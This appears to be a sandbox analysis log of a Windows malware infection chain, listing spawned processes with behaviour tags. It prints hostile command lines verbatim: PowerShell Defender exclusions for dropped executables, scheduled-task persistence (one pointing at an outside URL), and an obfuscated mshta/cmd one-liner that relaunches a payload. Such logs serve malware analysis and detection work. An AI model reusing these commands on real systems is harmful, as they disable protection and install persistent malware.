C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\877E.exe" -Force3⤵PID:4948
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\877E.exe" -Force3⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:3016 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6740
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe"3⤵
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- System policy modification
PID:7180 -
C:\Users\Admin\AppData\Local\Temp\1575c84f-7a06-4aa4-9075-6954c0641724\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\1575c84f-7a06-4aa4-9075-6954c0641724\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\1575c84f-7a06-4aa4-9075-6954c0641724\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run4⤵PID:8692
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1575c84f-7a06-4aa4-9075-6954c0641724\test.bat"5⤵PID:1252
-
-
-
C:\Users\Admin\AppData\Local\Temp\73b2ae87-19ce-4f7a-a84a-fd146112f6af\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\73b2ae87-19ce-4f7a-a84a-fd146112f6af\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\73b2ae87-19ce-4f7a-a84a-fd146112f6af\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run4⤵PID:8112
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73b2ae87-19ce-4f7a-a84a-fd146112f6af\test.bat"5⤵PID:3136
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe" -Force4⤵PID:1888
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe" -Force4⤵PID:6232
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2012
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe" -Force4⤵
- Blocklisted process makes network request
PID:9068
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\veejays\svchost.exe" -Force4⤵PID:5860
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe" -Force4⤵PID:908
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\veejays\svchost.exe" -Force4⤵PID:3340
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess.exe"4⤵PID:3120
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe"4⤵PID:1452
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"4⤵PID:4732
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess.exe"4⤵PID:6104
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe"4⤵PID:1468
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"4⤵PID:5364
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\veejays\svchost.exe" -Force3⤵PID:3212
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:6524
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\877E.exe" -Force3⤵PID:5944
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\veejays\svchost.exe" -Force3⤵PID:6484
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\DataSvcUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\DataSvcUtil.exe"3⤵PID:6724
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"3⤵PID:7104
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\EdmGen.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\EdmGen.exe"3⤵PID:7660
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"3⤵
- Modifies WinLogon for persistence
PID:6908
-
-
-
C:\Users\Admin\AppData\Local\Temp\4C27.exeC:\Users\Admin\AppData\Local\Temp\4C27.exe2⤵PID:8516
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8516 -s 4643⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7332
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8516 -s 4843⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6260
-
-
-
C:\Users\Admin\AppData\Local\Temp\7FAC.exeC:\Users\Admin\AppData\Local\Temp\7FAC.exe2⤵PID:8540
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8540 -s 2763⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:8940
-
-
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 460629855e209cd5b16a907274503a56 gT42+laoRUGWqQMp0E2DMg.0.1.0.3.01⤵
- Modifies data under HKEY_USERS
PID:2156
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2052
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2516 -
C:\Windows\uus\AMD64\MoUsoCoreWorker.exeC:\Windows\uus\AMD64\MoUsoCoreWorker.exe2⤵PID:5080
-
C:\Windows\system32\MoNotificationUx.exe%systemroot%\system32\MoNotificationUx.exe /ClearActiveNotifications3⤵PID:6920
-
-
-
C:\Windows\uus\AMD64\MoUsoCoreWorker.exeC:\Windows\uus\AMD64\MoUsoCoreWorker.exe2⤵PID:8060
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed128c2773227671b3f.exeWed128c2773227671b3f.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3436 -
C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed128c2773227671b3f.exeC:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed128c2773227671b3f.exe2⤵
- Executes dropped EXE
PID:5504
-
-
C:\Users\Admin\AppData\Local\Temp\is-OAD66.tmp\Wed120b6f5c6d562.tmp"C:\Users\Admin\AppData\Local\Temp\is-OAD66.tmp\Wed120b6f5c6d562.tmp" /SL5="$601E6,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed120b6f5c6d562.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1488 -
C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed120b6f5c6d562.exe"C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed120b6f5c6d562.exe" /SILENT2⤵
- Executes dropped EXE
PID:4248 -
C:\Users\Admin\AppData\Local\Temp\is-EF6K8.tmp\Wed120b6f5c6d562.tmp"C:\Users\Admin\AppData\Local\Temp\is-EF6K8.tmp\Wed120b6f5c6d562.tmp" /SL5="$10214,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed120b6f5c6d562.exe" /SILENT3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5204
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed121f7e9e92793cf.exeWed121f7e9e92793cf.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4616 -
C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed121f7e9e92793cf.exeC:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed121f7e9e92793cf.exe2⤵
- Executes dropped EXE
PID:5512
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed1229427acd4bc167.exeWed1229427acd4bc167.exe1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2280 -
C:\Users\Admin\Pictures\Adobe Films\kbTxHZeYOomBllay3dpYIR9f.exe"C:\Users\Admin\Pictures\Adobe Films\kbTxHZeYOomBllay3dpYIR9f.exe"2⤵
- Executes dropped EXE
PID:5692
-
-
C:\Users\Admin\Pictures\Adobe Films\XjhsglKxkrcTUd6de5gbWXb0.exe"C:\Users\Admin\Pictures\Adobe Films\XjhsglKxkrcTUd6de5gbWXb0.exe"2⤵
- Executes dropped EXE
PID:2536
-
-
C:\Users\Admin\Pictures\Adobe Films\hgFUPQSfVWja4bF9va2Nco94.exe"C:\Users\Admin\Pictures\Adobe Films\hgFUPQSfVWja4bF9va2Nco94.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- System policy modification
PID:1088 -
C:\Users\Admin\AppData\Local\Temp\e4ccc496-8308-4c13-89c2-d69b0ff5af01\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\e4ccc496-8308-4c13-89c2-d69b0ff5af01\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\e4ccc496-8308-4c13-89c2-d69b0ff5af01\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run3⤵PID:5560
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e4ccc496-8308-4c13-89c2-d69b0ff5af01\test.bat"4⤵PID:3020
-
-
-
C:\Users\Admin\AppData\Local\Temp\4ee538e0-75c4-4cc0-916e-b1b2320d2c64\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\4ee538e0-75c4-4cc0-916e-b1b2320d2c64\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\4ee538e0-75c4-4cc0-916e-b1b2320d2c64\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run3⤵PID:5744
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\4ee538e0-75c4-4cc0-916e-b1b2320d2c64\test.bat"4⤵PID:6848
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\hgFUPQSfVWja4bF9va2Nco94.exe" -Force3⤵PID:2196
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\hgFUPQSfVWja4bF9va2Nco94.exe" -Force3⤵PID:820
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\sememe\svchost.exe" -Force3⤵PID:6916
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\hgFUPQSfVWja4bF9va2Nco94.exe" -Force3⤵PID:7684
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\hgFUPQSfVWja4bF9va2Nco94.exe" -Force3⤵PID:5800
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\sememe\svchost.exe" -Force3⤵PID:6440
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regsql.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regsql.exe"3⤵PID:552
-
-
-
C:\Users\Admin\Pictures\Adobe Films\IjhdP4nV_bnmATIamZ0oM7vu.exe"C:\Users\Admin\Pictures\Adobe Films\IjhdP4nV_bnmATIamZ0oM7vu.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:4264 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "https://nougacoush.com/link?z=4569148" /tn "AV GORelease" /sc ONCE /st 8:36 /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:7044
-
-
C:\Users\Admin\Documents\NVg1F8f9lhkegqhXkgZUzsJM.exe"C:\Users\Admin\Documents\NVg1F8f9lhkegqhXkgZUzsJM.exe"3⤵PID:5640
-
C:\Users\Admin\Pictures\Adobe Films\lFtg__C2Cpn8OrS7hJpY6clc.exe"C:\Users\Admin\Pictures\Adobe Films\lFtg__C2Cpn8OrS7hJpY6clc.exe"4⤵PID:5548
-
-
C:\Users\Admin\Pictures\Adobe Films\7wc747c0WC3BtyLOOlwG6L2V.exe"C:\Users\Admin\Pictures\Adobe Films\7wc747c0WC3BtyLOOlwG6L2V.exe"4⤵PID:2616
-
-
C:\Users\Admin\Pictures\Adobe Films\Ty99QgeWSf6Pce3WUVUYdTgp.exe"C:\Users\Admin\Pictures\Adobe Films\Ty99QgeWSf6Pce3WUVUYdTgp.exe"4⤵PID:7376
-
C:\Users\Admin\Pictures\Adobe Films\Ty99QgeWSf6Pce3WUVUYdTgp.exe"C:\Users\Admin\Pictures\Adobe Films\Ty99QgeWSf6Pce3WUVUYdTgp.exe" -u5⤵PID:9068
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Drops file in Windows directory
PID:6316
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\rs8yrkYmjEo9RI0FOwCgCQdY.exe"C:\Users\Admin\Pictures\Adobe Films\rs8yrkYmjEo9RI0FOwCgCQdY.exe"4⤵PID:6560
-
-
C:\Users\Admin\Pictures\Adobe Films\_iDddTFaQKFX_GczW_SlobM1.exe"C:\Users\Admin\Pictures\Adobe Films\_iDddTFaQKFX_GczW_SlobM1.exe"4⤵PID:6420
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6420 -s 2765⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4036
-
-
-
C:\Users\Admin\Pictures\Adobe Films\9o14HWoUEuSmMPlQMLbWUqDC.exe"C:\Users\Admin\Pictures\Adobe Films\9o14HWoUEuSmMPlQMLbWUqDC.exe"4⤵PID:8036
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8036 -s 3005⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5352
-
-
-
C:\Users\Admin\Pictures\Adobe Films\dtIpIQ_qtf_Fq6mF3YqSxzxN.exe"C:\Users\Admin\Pictures\Adobe Films\dtIpIQ_qtf_Fq6mF3YqSxzxN.exe"4⤵
- Loads dropped DLL
PID:2964 -
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=15⤵
- Loads dropped DLL
- Adds Run key to start application
PID:5384 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--bo6y9QQgnM"6⤵PID:7532
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1d8,0x1d4,0x1d0,0x1fc,0x1cc,0x7ff86f36dec0,0x7ff86f36ded0,0x7ff86f36dee07⤵PID:4888
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff6a57f9e70,0x7ff6a57f9e80,0x7ff6a57f9e908⤵PID:7192
-
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1784,16950138151266137069,1560590402343067924,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7532_322797412" --mojo-platform-channel-handle=1640 /prefetch:87⤵PID:5340
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\twj_PyqVenFial9ZxFhPbo72.exe"C:\Users\Admin\Pictures\Adobe Films\twj_PyqVenFial9ZxFhPbo72.exe"4⤵PID:6532
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\twj_PyqVenFial9ZxFhPbo72.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\twj_PyqVenFial9ZxFhPbo72.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )5⤵PID:6296
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\twj_PyqVenFial9ZxFhPbo72.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\twj_PyqVenFial9ZxFhPbo72.exe" ) do taskkill -f -iM "%~NxM"6⤵PID:2912
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "twj_PyqVenFial9ZxFhPbo72.exe"7⤵
- Kills process with taskkill
PID:4228
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\TyORHIs1LZXKQSe6l2yLpqNb.exe"C:\Users\Admin\Pictures\Adobe Films\TyORHIs1LZXKQSe6l2yLpqNb.exe"4⤵PID:940
-
C:\Users\Admin\AppData\Local\Temp\is-DMAEN.tmp\TyORHIs1LZXKQSe6l2yLpqNb.tmp"C:\Users\Admin\AppData\Local\Temp\is-DMAEN.tmp\TyORHIs1LZXKQSe6l2yLpqNb.tmp" /SL5="$2057A,506127,422400,C:\Users\Admin\Pictures\Adobe Films\TyORHIs1LZXKQSe6l2yLpqNb.exe"5⤵
- Loads dropped DLL
PID:7940 -
C:\Users\Admin\AppData\Local\Temp\is-M2R22.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-M2R22.tmp\DYbALA.exe" /S /UID=27096⤵
- Drops file in Drivers directory
PID:7308 -
C:\Users\Admin\AppData\Local\Temp\3f-13f31-265-71f9d-fda5c0e745153\Fajulaelaeda.exe"C:\Users\Admin\AppData\Local\Temp\3f-13f31-265-71f9d-fda5c0e745153\Fajulaelaeda.exe"7⤵PID:5780
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\llsivpsf.og2\GcleanerEU.exe /eufive & exit8⤵PID:6040
-
C:\Users\Admin\AppData\Local\Temp\llsivpsf.og2\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\llsivpsf.og2\GcleanerEU.exe /eufive9⤵PID:6460
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6460 -s 23610⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5416
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xgfcv3dd.zz0\installer.exe /qn CAMPAIGN="654" & exit8⤵PID:8404
-
C:\Users\Admin\AppData\Local\Temp\xgfcv3dd.zz0\installer.exeC:\Users\Admin\AppData\Local\Temp\xgfcv3dd.zz0\installer.exe /qn CAMPAIGN="654"9⤵PID:3320
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\plhzcy0y.s1f\any.exe & exit8⤵PID:7696
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5164
-
-
C:\Users\Admin\AppData\Local\Temp\plhzcy0y.s1f\any.exeC:\Users\Admin\AppData\Local\Temp\plhzcy0y.s1f\any.exe9⤵PID:6176
-
C:\Users\Admin\AppData\Local\Temp\plhzcy0y.s1f\any.exe"C:\Users\Admin\AppData\Local\Temp\plhzcy0y.s1f\any.exe" -u10⤵PID:5668
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵PID:6040
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yejujauk.caq\gcleaner.exe /mixfive & exit8⤵PID:2428
-
C:\Users\Admin\AppData\Local\Temp\yejujauk.caq\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\yejujauk.caq\gcleaner.exe /mixfive9⤵PID:8448
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dy1l3ab4.gs5\autosubplayer.exe /S & exit8⤵PID:6252
-
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:2372
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:2156
-
-
-
C:\Users\Admin\Pictures\Adobe Films\ArGiap3960SUZs1dAEDT_gNj.exe"C:\Users\Admin\Pictures\Adobe Films\ArGiap3960SUZs1dAEDT_gNj.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:5420
-
-
C:\Users\Admin\Pictures\Adobe Films\RfdHYMkUrnVfH1ZtERmjgC7e.exe"C:\Users\Admin\Pictures\Adobe Films\RfdHYMkUrnVfH1ZtERmjgC7e.exe"2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6996
-
-
C:\Users\Admin\Pictures\Adobe Films\ImBQvx_Kr5O0lBuAItFuMM0V.exe"C:\Users\Admin\Pictures\Adobe Films\ImBQvx_Kr5O0lBuAItFuMM0V.exe"2⤵
- Executes dropped EXE
PID:1596 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1596 -s 2803⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6328
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed126ca6605dbec0399.exeWed126ca6605dbec0399.exe /mixone1⤵
- Executes dropped EXE
PID:3764 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 2402⤵
- Program crash
PID:2608
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed120b6f5c6d562.exeWed120b6f5c6d562.exe1⤵
- Executes dropped EXE
PID:3832
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2116 -ip 21161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4048
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 3764 -ip 37641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2592
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1116 -ip 11161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5144
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:6112 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:3228 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3228 -s 4563⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:988
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3228 -ip 32281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5312
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 408 -ip 4081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4880
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2960 -ip 29601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1304
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
